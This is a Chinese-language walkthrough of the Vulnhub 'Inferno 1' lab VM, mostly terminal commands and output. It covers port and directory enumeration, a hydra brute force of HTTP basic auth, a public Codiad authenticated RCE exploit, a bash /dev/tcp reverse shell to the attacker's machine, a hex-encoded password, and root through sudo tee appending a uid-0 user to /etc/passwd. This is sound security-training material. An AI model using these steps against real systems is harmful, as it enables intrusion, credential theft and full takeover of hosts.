Vulnhub之Inferno 1靶机解题过程
Inferno 1.1
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:82:57 1 60 PCS Systemtechnik GmbH
192.168.56.217 08:00:27:be:5e:e0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.217
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.217 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 06:09 EST
Nmap scan report for localhost (192.168.56.217)
Host is up (0.00034s latency).
Not shown: 65444 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 82:f4:d2:47:74:86:2f:b4:94:62:cd:31:f6:ef:51:a4 (RSA)
| 256 01:e9:02:a3:ff:ff:4a:7b:f2:20:1e:0b:44:9d:7f:f7 (ECDSA)
|_ 256 a5:dc:a7:b1:20:33:f1:8d:c7:dd:f1:a3:59:5d:c2:34 (ED25519)
23/tcp open telnet?
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain?
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Dante's Inferno
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open kerberos-sec?
106/tcp open pop3pw?
110/tcp open pop3?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
194/tcp open irc?
|_irc-info: Unable to open connection
389/tcp open ldap?
443/tcp open https?
464/tcp open kpasswd5?
636/tcp open ldapssl?
750/tcp open kerberos?
775/tcp open entomb?
777/tcp open multiling-http?
779/tcp open unknown
783/tcp open spamassassin?
808/tcp open ccproxy-http?
873/tcp open rsync?
1001/tcp open webpush?
1178/tcp open skkserv?
1210/tcp open eoss?
1236/tcp open bvcontrol?
1300/tcp open h323hostcallsc?
1313/tcp open bmc_patroldb?
1314/tcp open pdps?
1529/tcp open support?
2000/tcp open cisco-sccp?
2003/tcp open finger?
|_finger: ERROR: Script execution failed (use -d to debug)
2121/tcp open ccproxy-ftp?
2150/tcp open dynamic3d?
2600/tcp open zebrasrv?
2601/tcp open zebra?
2602/tcp open ripd?
2603/tcp open ripngd?
2604/tcp open ospfd?
2605/tcp open bgpd?
2606/tcp open netmon?
2607/tcp open connection?
2608/tcp open wag-service?
2988/tcp open hippad?
2989/tcp open zarkov?
4224/tcp open xtell?
4557/tcp open fax?
4559/tcp open hylafax?
4600/tcp open piranha1?
4949/tcp open munin?
5051/tcp open ida-agent?
5052/tcp open ita-manager?
5151/tcp open esri_sde?
5354/tcp open mdnsresponder?
5355/tcp open llmnr?
5432/tcp open postgresql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
5555/tcp open freeciv?
5666/tcp open nrpe?
5667/tcp open unknown
5674/tcp open hyperscsi-port?
5675/tcp open v5ua?
5680/tcp open canna?
6346/tcp open gnutella?
6514/tcp open syslog-tls?
6566/tcp open sane-port?
6667/tcp open irc?
|_irc-info: Unable to open connection
8021/tcp open ftp-proxy?
8081/tcp open blackice-icecap?
8088/tcp open radan-http?
8990/tcp open http-wmap?
9098/tcp open unknown
9359/tcp open unknown
9418/tcp open git?
9673/tcp open unknown
10000/tcp open snet-sensor-mgmt?
10081/tcp open famdc?
10082/tcp open amandaidx?
10083/tcp open amidxtape?
11201/tcp open smsqp?
15345/tcp open xpilot?
17001/tcp open unknown
17002/tcp open unknown
17003/tcp open unknown
17004/tcp open unknown
20011/tcp open unknown
20012/tcp open ss-idi-disc?
24554/tcp open binkp?
27374/tcp open subseven?
30865/tcp open unknown
57000/tcp open unknown
60177/tcp open unknown
60179/tcp open unknown
MAC Address: 08:00:27:BE:5E:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 770.19 seconds
NMAP扫描识别出来非常多的开放端口。
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ftp 192.168.56.217
ftp: Can't connect to `192.168.56.217:21': Connection refused
ftp: Can't connect to `192.168.56.217:ftp'
ftp> quit
FTP并没有开放。接下来先看80端口:
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ wget http://192.168.56.217/1.jpg
--2022-11-24 06:26:54-- http://192.168.56.217/1.jpg
Connecting to 192.168.56.217:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 680065 (664K) [image/jpeg]
Saving to: ‘1.jpg’
1.jpg 100%[=====================================================>] 664.13K --.-KB/s in 0.003s
2022-11-24 06:26:54 (229 MB/s) - ‘1.jpg’ saved [680065/680065]
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ steghide extract -sf 1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ stegseek 1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.48% (132.7 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ nikto -h http://192.168.56.217
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.217
+ Target Hostname: 192.168.56.217
+ Target Port: 80
+ Start Time: 2022-11-24 06:27:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 27e, size: 5b3384f358000, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-24 06:28:46 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ gobuster dir -u http://192.168.56.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.217
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/24 06:29:13 Starting gobuster in directory enumeration mode
===============================================================
/inferno (Status: 401) [Size: 461]
/server-status (Status: 403) [Size: 279]
Progress: 216786 / 220561 (98.29%)===============================================================
2022/11/24 06:29:37 Finished
===============================================================
发现了目录/inferno,发现该目录,有基本认证。但是目前没有其他办法,只能暴力破解/inferno,用hydra的时候,用户名猜测为admin,如果用一个字典,那么破解时间会非常长:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.56.217 http-get /inferno/ -t 64
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-24 07:43:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://192.168.56.217:80/inferno/
[80][http-get] host: 192.168.56.217 login: admin password: dante1
[STATUS] attack finished for 192.168.56.217 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-24 07:44:23
破解出来密码为dante1,那么登录/inferno页面
发现Title是codiad,查询一下CMS有没有漏洞可以利用
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ searchsploit codiad
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) | multiple/webapps/50474.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ searchsploit -m multiple/webapps/49705.py
Exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49705
Path: /usr/share/exploitdb/exploits/multiple/webapps/49705.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Inferno/49705.py
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg 49705.py nmap_full_scan
但是执行49705代码一直出错,根据别人的提示,找了一个类似的漏洞利用代码是python2写的
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
Cloning into 'Codiad-Remote-Code-Execute-Exploit'...
remote: Enumerating objects: 133, done.
remote: Total 133 (delta 0), reused 0 (delta 0), pack-reused 133
Receiving objects: 100% (133/133), 2.15 MiB | 2.80 MiB/s, done.
Resolving deltas: 100% (56/56), done.
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg 49705.py Codiad-Remote-Code-Execute-Exploit nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ cd Codiad-Remote-Code-Execute-Exploit
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ ls
exploit.py img README.md
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python exploit.py http://admin:dante1/192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
File "/home/kali/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit/exploit.py", line 22
print "[+] Login Content : %s" % (content)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python2 exploit.py http://admin:dante1/192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
nc -lnvp 5556
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
Traceback (most recent call last):
File "exploit.py", line 160, in <module>
main()
File "exploit.py", line 143, in main
if not login(domain, username, password):
File "exploit.py", line 20, in login
response = session.post(url, data=data, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 578, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 382, in prepare_url
requests.exceptions.InvalidURL: Failed to parse: http://admin:dante1/192.168.56.217/inferno//components/user/controller.php?action=authenticate
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python2 exploit.py http://admin:dante1@192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
nc -lnvp 5556
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.217] 38566
──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo nc -nlvp 5556
[sudo] password for kali:
listening on [any] 5556 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.217] 44524
bash: cannot set terminal process group (500): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$
www-data@Inferno:/home/dante$ ls -alh
ls -alh
total 64K
drwxr-xr-x 11 dante dante 4.0K Dec 6 2020 .
drwxr-xr-x 3 root root 4.0K Dec 6 2020 ..
-rw------- 1 dante dante 52 Dec 6 2020 .Xauthority
lrwxrwxrwx 1 root root 9 Dec 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 dante dante 220 Dec 6 2020 .bash_logout
-rw-r--r-- 1 dante dante 3.5K Dec 6 2020 .bashrc
drwxr-xr-x 3 dante dante 4.0K Dec 6 2020 .local
-rw-r--r-- 1 dante dante 807 Dec 6 2020 .profile
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Desktop
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Documents
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Downloads
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Music
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Pictures
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Public
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Templates
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Videos
-rw------- 1 dante dante 33 Dec 6 2020 local.txt
www-data@Inferno:/home/dante$ cd Downloads
cd Downloads
www-data@Inferno:/home/dante/Downloads$ ls -alh
ls -alh
total 8.3M
drwxr-xr-x 2 root root 4.0K Dec 6 2020 .
drwxr-xr-x 11 dante dante 4.0K Dec 6 2020 ..
-rw-r--r-- 1 root root 1.5K Nov 3 2020 .download.dat
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoI.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoII.docx
-rwxr-xr-x 1 root root 95K Dec 6 2020 CantoIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoIV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoIX.docx
-rwxr-xr-x 1 root root 43K Dec 6 2020 CantoV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoVI.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoVII.docx
-rwxr-xr-x 1 root root 3.6M Dec 6 2020 CantoVIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoX.docx
-rwxr-xr-x 1 root root 119K Dec 6 2020 CantoXI.docx
-rwxr-xr-x 1 root root 154K Dec 6 2020 CantoXII.docx
-rwxr-xr-x 1 root root 209K Dec 6 2020 CantoXIII.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoXIV.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoXIX.docx
-rwxr-xr-x 1 root root 95K Dec 6 2020 CantoXV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoXVI.docx
-rwxr-xr-x 1 root root 119K Dec 6 2020 CantoXVII.docx
-rwxr-xr-x 1 root root 2.7M Dec 6 2020 CantoXVIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoXX.docx
www-data@Inferno:/home/dante/Downloads$ cat .download.data
cat .download.data
cat: .download.data: No such file or directory
www-data@Inferno:/home/dante/Downloads$ cd .download.data
cd .download.data
bash: cd: .download.data: No such file or directory
www-data@Inferno:/home/dante/Downloads$ cd .download.dat
cd .download.dat
bash: cd: .download.dat: Not a directory
www-data@Inferno:/home/dante/Downloads$ cat .download.dat
cat .download.dat
c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0awww-data@Inferno:/home/dante/Downloads$
用cyberchef解码后,得到dante的密码:V1rg1l10h3lpm3
SSH登录dante
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ssh dante@192.168.56.217
The authenticity of host '192.168.56.217 (192.168.56.217)' can't be established.
ED25519 key fingerprint is SHA256:6G6ekHIDCC2b1vcJkyf1EFkDe6oT6YDmwyhvpcoZ8eM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.217' (ED25519) to the list of known hosts.
dante@192.168.56.217's password:
Linux Inferno 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 6 08:00:42 2020 from 192.168.1.124
dante@Inferno:~$ id
uid=1000(dante) gid=1000(dante) groups=1000(dante),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/tee
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"
可以利用tee提权
可以写入/etc/passwd文件,具有root权限的用户
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ mkpasswd -m sha-512
Password:
$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0
dante@Inferno:~$ LFILE=/etc/passwd
dante@Inferno:~$ echo 'jason:$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"
jason:$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0:0:0:root:/root:/bin/bash
dante@Inferno:~$ su - jason
Password:
root@Inferno:~# cd /root
root@Inferno:~# ls -alh
total 36K
drwx------ 3 root root 4.0K Dec 6 2020 .
drwxr-xr-x 18 root root 4.0K Dec 6 2020 ..
lrwxrwxrwx 1 root root 9 Dec 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Dec 6 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 dante dante 9.3K Dec 6 2020 proof.txt
-rw-r--r-- 1 root root 66 Dec 6 2020 .selected_editor
root@Inferno:~# cat proof.txtlogout
dante@Inferno:~$
dante@Inferno:~$
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号